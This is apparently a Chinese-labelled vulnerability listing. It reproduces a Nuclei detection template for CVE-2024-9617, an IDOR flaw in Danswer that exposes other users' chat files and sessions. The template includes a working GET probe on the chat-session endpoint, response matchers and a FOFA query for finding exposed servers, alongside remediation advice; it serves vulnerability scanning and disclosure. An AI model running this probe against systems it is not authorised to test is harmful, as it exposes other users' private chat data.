漏洞描述
The application does not verify whether the attacker is the creator of the file, allowing the attacker to directly call the GET /api/chat/file/{file_id} interface to view any user's file.
CVE-2024-9617: Danswer - Insecure Direct Object Reference
PoC代码[已公开]
id: CVE-2024-9617
info:
name: Danswer - Insecure Direct Object Reference
author: s4e-io
severity: medium
description: |
The application does not verify whether the attacker is the creator of the file, allowing the attacker to directly call the GET /api/chat/file/{file_id} interface to view any user's file.
impact: |
Authenticated attackers can access and view files belonging to other users without proper authorization checks through insecure direct object references, leading to unauthorized disclosure of sensitive chat files and data.
remediation: |
Update Danswer to a version that implements proper authorization checks to verify file ownership before allowing access through the GET /api/chat/file/{file_id} and GET /api/chat/get-chat-session endpoints.
reference:
- https://huntr.com/bounties/8f683ff6-3a99-41c6-b763-a8f7b73bd146
- https://github.com/danswer-ai/danswer
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
cvss-score: 6.5
cve-id: CVE-2024-9617
cwe-id: CWE-284
epss-score: 0.17349
epss-percentile: 0.94855
metadata:
verified: true
max-request: 1
vendor: danswer-ai
product: danswer
fofa-query: icon_hash="484766002"
tags: cve,cve2024,danswer,idor,vuln
http:
- method: GET
path:
- "{{BaseURL}}/api/chat/get-chat-session/1?is_shared=True"
matchers:
- type: dsl
dsl:
- 'contains_all(body, "chat_session_id", "description", "persona_id")'
- 'contains(content_type, "application/json")'
- 'status_code == 200'
condition: and
# digest: 4a0a00473045022100d56b782fef5d794abfcabfe78cd19b162308a574365c47476152e46316742bca02200e73e9f5cb1f8acde74853c2ceaf63fb24a4eb2be7c3f52fda9dfac4376c262a:922c64590222798bb761d5b6d8e72950